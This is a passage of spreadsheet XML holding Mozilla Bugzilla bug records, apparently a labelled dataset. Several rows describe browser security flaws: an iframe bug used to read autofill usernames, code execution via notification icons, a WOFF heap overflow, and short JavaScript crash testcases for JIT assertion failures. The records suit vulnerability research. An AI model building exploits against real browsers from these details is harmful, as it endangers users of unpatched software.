      <c r="U3013" t="n">
        <v>0</v>
      </c>
      <c r="V3013" t="n">
        <v>26</v>
      </c>
      <c r="W3013" t="inlineStr">
        <is>
          <t>Created attachment 8817863
ff-iframes-break-scope.zip
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36
Steps to reproduce:
Please open ff-iframe-break-scope.zip in the attachment to reproduce the bug.
I have a website (index.html). On that website i include Iframe 1 (iframe-1.html) with &lt;iframe ...&gt;. Also there is a link to reload the page with location.reload().
In Iframe 1 (iframe-1.html) there I create a new Iframe with document.createElement.
In Iframe 2 (iframe-2.html) I create another new Iframe. I have a Iframe Element without src-attribute in the page. And after a timeout I Iframe-Element gets a Source.
Iframe 3 only contains some HTML. 
---
Important: This bug also works with 3rd party (cross domain) Iframes. In online advertising this is not a unusal construction. In ff-get-username.zip I use this bug to get the autofill username from a page. Just start with step-1.html.
Actual results:
If I press the "Click me" link twice, the page doesn't reload. Instead the Content from the last Iframe ist shown.
Expected results:
The page should reload.</t>
        </is>
      </c>
      <c r="X3013" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3014">
      <c r="A3014" t="n">
        <v>987003</v>
      </c>
      <c r="B3014" t="inlineStr">
        <is>
          <t>2014-03-23 21:02:31 -0700</t>
        </is>
      </c>
      <c r="C3014" t="inlineStr">
        <is>
          <t>Arbitrary code execution from web notifications</t>
        </is>
      </c>
      <c r="D3014" t="inlineStr">
        <is>
          <t>2024-05-30 08:33:16 -0700</t>
        </is>
      </c>
      <c r="E3014" t="n">
        <v>1</v>
      </c>
      <c r="F3014" t="n">
        <v>1</v>
      </c>
      <c r="G3014" t="n">
        <v>3</v>
      </c>
      <c r="H3014" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3014" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3014" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K3014" t="inlineStr">
        <is>
          <t>28 Branch</t>
        </is>
      </c>
      <c r="L3014" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3014" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N3014" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3014" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3014" t="inlineStr">
        <is>
          <t>[adv-main29+][adv-esr24.5+]</t>
        </is>
      </c>
      <c r="Q3014" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3014" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3014" t="inlineStr">
        <is>
          <t>mozilla31</t>
        </is>
      </c>
      <c r="T3014" t="n">
        <v>1</v>
      </c>
      <c r="U3014" t="n">
        <v>0</v>
      </c>
      <c r="V3014" t="n">
        <v>43</v>
      </c>
      <c r="W3014" t="inlineStr">
        <is>
          <t>There's no security check for the icon URL in notifications -- as a result, pages with the notification permission can run arbitrary code. Websites with no such privilege can try clickjacking, especially that there's no security delay on the notification prompt.</t>
        </is>
      </c>
      <c r="X3014" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3015">
      <c r="A3015" t="n">
        <v>825651</v>
      </c>
      <c r="B3015" t="inlineStr">
        <is>
          <t>2012-12-31 12:14:50 -0800</t>
        </is>
      </c>
      <c r="C3015" t="inlineStr">
        <is>
          <t>Another WebRTC use-after-free crash</t>
        </is>
      </c>
      <c r="D3015" t="inlineStr">
        <is>
          <t>2016-12-01 13:31:27 -0800</t>
        </is>
      </c>
      <c r="E3015" t="n">
        <v>1</v>
      </c>
      <c r="F3015" t="n">
        <v>1</v>
      </c>
      <c r="G3015" t="n">
        <v>3</v>
      </c>
      <c r="H3015" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3015" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3015" t="inlineStr">
        <is>
          <t>WebRTC: Networking</t>
        </is>
      </c>
      <c r="K3015" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3015" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3015" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3015" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3015" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3015" t="inlineStr">
        <is>
          <t>[WebRTC], [blocking-webrtc+], [nICEr] [adv-main20-]</t>
        </is>
      </c>
      <c r="Q3015" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3015" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3015" t="inlineStr">
        <is>
          <t>mozilla20</t>
        </is>
      </c>
      <c r="T3015" t="n">
        <v>1</v>
      </c>
      <c r="U3015" t="n">
        <v>0</v>
      </c>
      <c r="V3015" t="n">
        <v>18</v>
      </c>
      <c r="W3015" t="inlineStr">
        <is>
          <t>Created attachment 696779
Callstack
The test-case in the URL fails 80% of the time for me when testing patch " Fixed RUN_ON_THREAD to not dispatch on own thread." in Bug 824851. I'm not able to make it crash without that patch.
I speculate that fixing RUN_ON_THREAD may have altered code that relied on the old (broken) behavior, or at least changed the timing around enough to have an impact.</t>
        </is>
      </c>
      <c r="X3015" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3016">
      <c r="A3016" t="n">
        <v>552216</v>
      </c>
      <c r="B3016" t="inlineStr">
        <is>
          <t>2010-03-13 13:41:54 -0800</t>
        </is>
      </c>
      <c r="C3016" t="inlineStr">
        <is>
          <t>WOFF heap corruption due to integer overflow</t>
        </is>
      </c>
      <c r="D3016" t="inlineStr">
        <is>
          <t>2010-04-14 23:24:22 -0700</t>
        </is>
      </c>
      <c r="E3016" t="n">
        <v>1</v>
      </c>
      <c r="F3016" t="n">
        <v>1</v>
      </c>
      <c r="G3016" t="n">
        <v>3</v>
      </c>
      <c r="H3016" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3016" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3016" t="inlineStr">
        <is>
          <t>Layout: Text and Fonts</t>
        </is>
      </c>
      <c r="K3016" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3016" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3016" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3016" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3016" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3016" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q3016" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3016" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3016" t="inlineStr">
        <is>
          <t>mozilla1.9.3a4</t>
        </is>
      </c>
      <c r="T3016" t="n">
        <v>1</v>
      </c>
      <c r="U3016" t="n">
        <v>0</v>
      </c>
      <c r="V3016" t="n">
        <v>32</v>
      </c>
      <c r="W3016" t="inlineStr">
        <is>
          <t>Created attachment 432357
Proof of concept
Evgeny L. from Vulndisco reported a crash due to a buffer overflow in our WOFF parser.  I am able to reproduce the crash, but the stack I get doesn't appear to be in font parser code.  I'll try it in a debug build shortly to see if it looks any different.  Here's the crash report where it looks like we're calling null:
0bc35855-ee77-4c61-b469-c7c482100313
To reproduce, run the attached python script ff1.py and load
http://localhost:8080/1.html</t>
        </is>
      </c>
      <c r="X3016" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3017">
      <c r="A3017" t="n">
        <v>734385</v>
      </c>
      <c r="B3017" t="inlineStr">
        <is>
          <t>2012-03-09 07:32:06 -0800</t>
        </is>
      </c>
      <c r="C3017" t="inlineStr">
        <is>
          <t>special hosts errors on balrog dev servers</t>
        </is>
      </c>
      <c r="D3017" t="inlineStr">
        <is>
          <t>2018-05-08 15:19:48 -0700</t>
        </is>
      </c>
      <c r="E3017" t="n">
        <v>1</v>
      </c>
      <c r="F3017" t="n">
        <v>1</v>
      </c>
      <c r="G3017" t="n">
        <v>5</v>
      </c>
      <c r="H3017" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3017" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J3017" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3017" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3017" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3017" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3017" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3017" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3017" t="inlineStr">
        <is>
          <t>[balrog]</t>
        </is>
      </c>
      <c r="Q3017" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3017" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3017" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3017" t="n">
        <v>1</v>
      </c>
      <c r="U3017" t="n">
        <v>0</v>
      </c>
      <c r="V3017" t="n">
        <v>4</v>
      </c>
      <c r="W3017" t="inlineStr">
        <is>
          <t>These started after bug 685862 landed. We should get the servers updated with the new configuration variable, but we should probably cope with this more gracefully....
I think there might be another bug, too. This line treats it like a string:
https://github.com/mozilla/balrog/commit/720ea0fc34fb96a19b47814e8015af81fed161d2#L0R156
But https://github.com/mozilla/balrog/commit/720ea0fc34fb96a19b47814e8015af81fed161d2#L2L0 implies that it's a tuple/iterable.
ERROR:auslib.client.base:Exception on /update/3/Firefox/13.0a1/20120305031045/Linux_x86_64-gcc3/en-US/nightly/Linux 3.2.0-1-amd64 (GTK 2.24.9)/default/default/update.xml [GET]
Traceback (most recent call last):
  File "/usr/lib/python2.6/site-packages/flask/app.py", line 1292, in wsgi_app
    response = self.full_dispatch_request()
  File "/usr/lib/python2.6/site-packages/flask/app.py", line 1062, in full_dispatch_request
    rv = self.handle_user_exception(e)
  File "/usr/lib/python2.6/site-packages/flask/app.py", line 1060, in full_dispatch_request
    rv = self.dispatch_request()
  File "/usr/lib/python2.6/site-packages/flask/app.py", line 1047, in dispatch_request
    return self.view_functions[rule.endpoint](**req.view_args)
  File "/usr/lib/python2.6/site-packages/flask/views.py", line 56, in view
    return self.dispatch_request(*args, **kwargs)
  File "/usr/lib/python2.6/site-packages/flask/views.py", line 112, in dispatch_request
    return meth(*args, **kwargs)
  File "/data/www/aus4-dev.allizom.org/auslib/client/views/client.py", line 59, in get
    xml = AUS.createXML(query, rule)
  File "/data/www/aus4-dev.allizom.org/auslib/AUS.py", line 215, in createXML
    rel = self.expandRelease(updateQuery, release)
  File "/data/www/aus4-dev.allizom.org/auslib/AUS.py", line 156, in expandRelease
    if updateQuery['force'] and url.startswith(self.specialForceHosts):
TypeError: expected a character buffer object
ERROR:auslib.client.views.client:Caught ISA 500 error.
DEBUG:auslib.client.views.client:Balrog version is: 0.1.1
DEBUG:auslib.client.views.client:Request path is: /update/3/Firefox/13.0a1/20120305031045/Linux_x86_64-gcc3/en-US/nightly/Linux 3.2.0-1-amd64 (GTK 2.24.9)/default/default/update.xml</t>
        </is>
      </c>
      <c r="X3017" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3018">
      <c r="A3018" t="n">
        <v>1086842</v>
      </c>
      <c r="B3018" t="inlineStr">
        <is>
          <t>2014-10-21 11:11:14 -0700</t>
        </is>
      </c>
      <c r="C3018" t="inlineStr">
        <is>
          <t>Assertion failure: [infer failure] Missing type in object [0x10512ecf0] value: [0x10512e858], at js/src/jsinfer.cpp</t>
        </is>
      </c>
      <c r="D3018" t="inlineStr">
        <is>
          <t>2016-06-04 16:13:38 -0700</t>
        </is>
      </c>
      <c r="E3018" t="n">
        <v>1</v>
      </c>
      <c r="F3018" t="n">
        <v>1</v>
      </c>
      <c r="G3018" t="n">
        <v>3</v>
      </c>
      <c r="H3018" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3018" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3018" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K3018" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3018" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3018" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3018" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3018" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3018" t="inlineStr">
        <is>
          <t>[jsbugmon:update][adv-main34+][b2g-adv-main2.2-]</t>
        </is>
      </c>
      <c r="Q3018" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3018" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3018" t="inlineStr">
        <is>
          <t>mozilla36</t>
        </is>
      </c>
      <c r="T3018" t="n">
        <v>1</v>
      </c>
      <c r="U3018" t="n">
        <v>0</v>
      </c>
      <c r="V3018" t="n">
        <v>16</v>
      </c>
      <c r="W3018" t="inlineStr">
        <is>
          <t>x = []
for (v of x) {}
Object.defineProperty(x, 1, {})
Set(Object.create([0, Number, []]))
asserts js debug shell on m-c changeset 33c0181c4a25 with --ion-eager --no-threads at Assertion failure: [infer failure] Missing type in object [0x10512ecf0] value: [0x10512e858], at js/src/jsinfer.cpp.
Debug configure options:
CC="clang -Qunused-arguments" CXX="clang++ -Qunused-arguments" AR=ar sh /Users/skywalker/trees/mozilla-central/js/src/configure --target=x86_64-apple-darwin12.5.0 --enable-debug --enable-optimize --enable-nspr-build --enable-more-deterministic --with-ccache --enable-gczeal --enable-debug-symbols --disable-tests
autoBisect shows this is probably related to the following changeset:
The first bad revision is:
changeset:   https://hg.mozilla.org/mozilla-central/rev/2048240a81d2
user:        Jan de Mooij
date:        Tue Apr 29 08:54:46 2014 +0200
summary:     Bug 1000942 - Eliminate some unnecessary object type barriers. r=bhackett
Setting s-s and assuming sec-critical because this is a type inference failure.
Jan, is bug 1000942 a possible regressor?</t>
        </is>
      </c>
      <c r="X3018" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3019">
      <c r="A3019" t="n">
        <v>466763</v>
      </c>
      <c r="B3019" t="inlineStr">
        <is>
          <t>2008-11-25 19:53:32 -0800</t>
        </is>
      </c>
      <c r="C3019" t="inlineStr">
        <is>
          <t>Crash [@ nsCSSFrameConstructor::ConstructFrame] with RTL, floating first-letter</t>
        </is>
      </c>
      <c r="D3019" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:47 -0700</t>
        </is>
      </c>
      <c r="E3019" t="n">
        <v>1</v>
      </c>
      <c r="F3019" t="n">
        <v>1</v>
      </c>
      <c r="G3019" t="n">
        <v>3</v>
      </c>
      <c r="H3019" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3019" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3019" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K3019" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3019" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3019" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3019" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3019" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3019" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q3019" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3019" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3019" t="inlineStr">
        <is>
          <t>mozilla1.9.2a1</t>
        </is>
      </c>
      <c r="T3019" t="n">
        <v>1</v>
      </c>
      <c r="U3019" t="n">
        <v>0</v>
      </c>
      <c r="V3019" t="n">
        <v>12</v>
      </c>
      <c r="W3019" t="inlineStr">
        <is>
          <t>Created attachment 350104
testcase
Thread 0 Crashed:
0   0xdddddddd
1   nsCSSFrameConstructor::ConstructFrame(nsFrameConstructorState&amp;, nsIContent*, nsIFrame*, nsFrameItems&amp;) + 89 (nsCSSFrameConstructor.cpp:7379)
2   nsCSSFrameConstructor::ContentAppended(nsIContent*, int) + 2090 (nsCSSFrameConstructor.cpp:8580)
3   PresShell::ContentAppended(nsIDocument*, nsIContent*, int) + 279 (nsPresShell.cpp:4698)
4   nsNodeUtils::ContentAppended(nsIContent*, int) + 324 (nsNodeUtils.cpp:119)
5   nsGenericElement::doInsertChildAt(nsIContent*, unsigned int, int, nsIContent*, nsIDocument*, nsAttrAndChildArray&amp;) + 1669 (nsGenericElement.cpp:3265)
6   nsGenericElement::InsertChildAt(nsIContent*, unsigned int, int) + 127 (nsGenericElement.cpp:3193)
7   nsGenericElement::doReplaceOrInsertBefore(int, nsIDOMNode*, nsIDOMNode*, nsIContent*, nsIDocument*, nsIDOMNode**) + 4185 (nsGenericElement.cpp:3929)
8   nsGenericElement::InsertBefore(nsIDOMNode*, nsIDOMNode*, nsIDOMNode**) + 63 (nsGenericElement.cpp:3512)
9   nsHTMLSpanElement::InsertBefore(nsIDOMNode*, nsIDOMNode*, nsIDOMNode**) + 38 (nsHTMLSpanElement.cpp:57)
10  nsGenericElement::AppendChild(nsIDOMNode*, nsIDOMNode**) + 48 (nsGenericElement.h:497)
11  nsHTMLSpanElement::AppendChild(nsIDOMNode*, nsIDOMNode**) + 31 (nsHTMLSpanElement.cpp:57)
12  nsIDOMNode_AppendChild(JSContext*, unsigned int, long*) + 488 (dom_quickstubs.cpp:2339)
13  js_Interpret + 93406 (jsinterp.cpp:5118)</t>
        </is>
      </c>
      <c r="X3019" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3020">
      <c r="A3020" t="n">
        <v>727330</v>
      </c>
      <c r="B3020" t="inlineStr">
        <is>
          <t>2012-02-14 17:56:13 -0800</t>
        </is>
      </c>
      <c r="C3020" t="inlineStr">
        <is>
          <t>"Assertion failure: (*dictp)-&gt;inDictionary()" when proxy fix returns a large array</t>
        </is>
      </c>
      <c r="D3020" t="inlineStr">
        <is>
          <t>2013-01-19 14:05:11 -0800</t>
        </is>
      </c>
      <c r="E3020" t="n">
        <v>1</v>
      </c>
      <c r="F3020" t="n">
        <v>1</v>
      </c>
      <c r="G3020" t="n">
        <v>3</v>
      </c>
      <c r="H3020" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3020" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3020" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3020" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3020" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3020" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3020" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3020" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3020" t="inlineStr">
        <is>
          <t>[sg:critical][qa-] js-triage-done</t>
        </is>
      </c>
      <c r="Q3020" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3020" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3020" t="inlineStr">
        <is>
          <t>mozilla13</t>
        </is>
      </c>
      <c r="T3020" t="n">
        <v>1</v>
      </c>
      <c r="U3020" t="n">
        <v>0</v>
      </c>
      <c r="V3020" t="n">
        <v>23</v>
      </c>
      <c r="W3020" t="inlineStr">
        <is>
          <t>var a = [];
for (var i = 0; i &lt; 200; ++i) a.push({});
var p = Proxy.create({fix: function() { return a; }});
Object.preventExtensions(p);
Assertion failure: (*dictp)-&gt;inDictionary(), at js/src/jsscopeinlines.h:359
The first bad revision is:
changeset:   ff51ddfdf5d1
user:        Brian Hackett
date:        Wed Sep 28 15:04:55 2011 -0700
summary:     Remove shape numbers and Shape::slotSpan, factor Shape getter/setter into BaseShape, bug 684505.</t>
        </is>
      </c>
      <c r="X3020" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3021">
      <c r="A3021" t="n">
        <v>652193</v>
      </c>
      <c r="B3021" t="inlineStr">
        <is>
          <t>2011-04-22 12:29:56 -0700</t>
        </is>
      </c>
      <c r="C3021" t="inlineStr">
        <is>
          <t>Studies won't load in Aurora with 1.0.9</t>
        </is>
      </c>
      <c r="D3021" t="inlineStr">
        <is>
          <t>2016-05-10 13:13:22 -0700</t>
        </is>
      </c>
      <c r="E3021" t="n">
        <v>1</v>
      </c>
      <c r="F3021" t="n">
        <v>1</v>
      </c>
      <c r="G3021" t="n">
        <v>6</v>
      </c>
      <c r="H3021" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3021" t="inlineStr">
        <is>
          <t>Mozilla Labs Graveyard</t>
        </is>
      </c>
      <c r="J3021" t="inlineStr">
        <is>
          <t>Test Pilot</t>
        </is>
      </c>
      <c r="K3021" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3021" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3021" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3021" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3021" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3021" t="inlineStr">
        <is>
          <t>[testday-20110422][approved patches landed on aurora]</t>
        </is>
      </c>
      <c r="Q3021" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3021" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S3021" t="inlineStr">
        <is>
          <t>1.1</t>
        </is>
      </c>
      <c r="T3021" t="n">
        <v>1</v>
      </c>
      <c r="U3021" t="n">
        <v>0</v>
      </c>
      <c r="V3021" t="n">
        <v>8</v>
      </c>
      <c r="W3021" t="inlineStr">
        <is>
          <t>With latest Aurora build from 20110422
Click the Feedback button and select "All your user studies"
The Studies window opens but studies never load with "Loading, please wait..." indefinitely.</t>
        </is>
      </c>
      <c r="X3021" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3022">
      <c r="A3022" t="n">
        <v>1786818</v>
      </c>
      <c r="B3022" t="inlineStr">
        <is>
          <t>2022-08-24 05:00:21 -0700</t>
        </is>
      </c>
      <c r="C3022" t="inlineStr">
        <is>
          <t>always hold a ref while ticking the refresh driver</t>
        </is>
      </c>
      <c r="D3022" t="inlineStr">
        <is>
          <t>2023-01-16 21:00:26 -0800</t>
        </is>
      </c>
      <c r="E3022" t="n">
        <v>1</v>
      </c>
      <c r="F3022" t="n">
        <v>1</v>
      </c>
      <c r="G3022" t="n">
        <v>3</v>
      </c>
      <c r="H3022" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3022" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3022" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K3022" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3022" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3022" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3022" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3022" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3022" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main106+r]</t>
        </is>
      </c>
      <c r="Q3022" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3022" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S3022" t="inlineStr">
        <is>
          <t>106 Branch</t>
        </is>
      </c>
      <c r="T3022" t="n">
        <v>1</v>
      </c>
      <c r="U3022" t="n">
        <v>0</v>
      </c>
      <c r="V3022" t="n">
        <v>4</v>
      </c>
      <c r="W3022" t="inlineStr">
        <is>
          <t>Two places don't seem to
https://searchfox.org/mozilla-central/rev/d01591796d5faccf762adb09a311d8ee12f7ca7f/image/SVGDocumentWrapper.cpp#183
https://searchfox.org/mozilla-central/rev/d01591796d5faccf762adb09a311d8ee12f7ca7f/dom/base/nsDOMWindowUtils.cpp#2823
The first is inside svg images, and those documents have scripting restricted I believe so a tick can do less than in a general document.
The second is test only code that you need privileges for.
So this doesn't seem to be a big deal.
Noticed these while looking into bug 1762368.</t>
        </is>
      </c>
      <c r="X3022" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3023">
      <c r="A3023" t="n">
        <v>1530728</v>
      </c>
      <c r="B3023" t="inlineStr">
        <is>
          <t>2019-02-26 08:58:08 -0800</t>
        </is>
      </c>
      <c r="C3023" t="inlineStr">
        <is>
          <t>audit all types of releases associated artifacts</t>
        </is>
      </c>
      <c r="D3023" t="inlineStr">
        <is>
          <t>2019-09-09 05:38:45 -0700</t>
        </is>
      </c>
      <c r="E3023" t="n">
        <v>1</v>
      </c>
      <c r="F3023" t="n">
        <v>1</v>
      </c>
      <c r="G3023" t="n">
        <v>5</v>
      </c>
      <c r="H3023" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3023" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J3023" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3023" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3023" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3023" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3023" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3023" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3023" t="inlineStr"/>
      <c r="Q3023" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3023" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3023" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3023" t="n">
        <v>1</v>
      </c>
      <c r="U3023" t="n">
        <v>0</v>
      </c>
      <c r="V3023" t="n">
        <v>23</v>
      </c>
      <c r="W3023" t="inlineStr">
        <is>
          <t>TC migration project completed last year and in the meantime we had several attempts to glance at the artifacts we're actually transferring for various types of releases in the gecko family. Given some of the boilerplate code that is shared in parts of the beetmover's transforms (tool that taslk to TC and S3 in order to ensure the pretty naming + transferring of the files) we suspect that there might have been accidental unneeded artifacts across different types of releases (e.g. nightly artifacts that have been naturally ported to beta/release without a real need of that beforehand, no longer used artifacts (e.g. awsy files?), etc).
As a technical debt or simply to better understand our downstream usage, we're aiming to perform an artifacts audit.
Done right, we should be able to identify the list of artifacts needed for a certain type of release. Cleaning up and minimizing those lists of artifacts has some beneficial side-effects that include but are not limited to:
1) reducing end-to-end overall times of a release time by avoiding to download of unnecessary artifacts in CoT and beetmover upload
2) S3 storage space $$$
3) simplifying declarative artifacts manifests
4) sanitization/cleanup as technical debt
Marking this as sensitive bug until further notice.</t>
        </is>
      </c>
      <c r="X3023" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3024">
      <c r="A3024" t="n">
        <v>1459607</v>
      </c>
      <c r="B3024" t="inlineStr">
        <is>
          <t>2018-05-07 06:15:30 -0700</t>
        </is>
      </c>
      <c r="C3024" t="inlineStr">
        <is>
          <t>Assertion failure: !v.isString() || v.toString()-&gt;isAtom() (Handle non-atomized strings outside IonBuilder.), at js/src/jit/IonBuilder.cpp:13624</t>
        </is>
      </c>
      <c r="D3024" t="inlineStr">
        <is>
          <t>2023-12-06 07:50:07 -0800</t>
        </is>
      </c>
      <c r="E3024" t="n">
        <v>1</v>
      </c>
      <c r="F3024" t="n">
        <v>1</v>
      </c>
      <c r="G3024" t="n">
        <v>3</v>
      </c>
      <c r="H3024" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3024" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3024" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3024" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3024" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3024" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3024" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
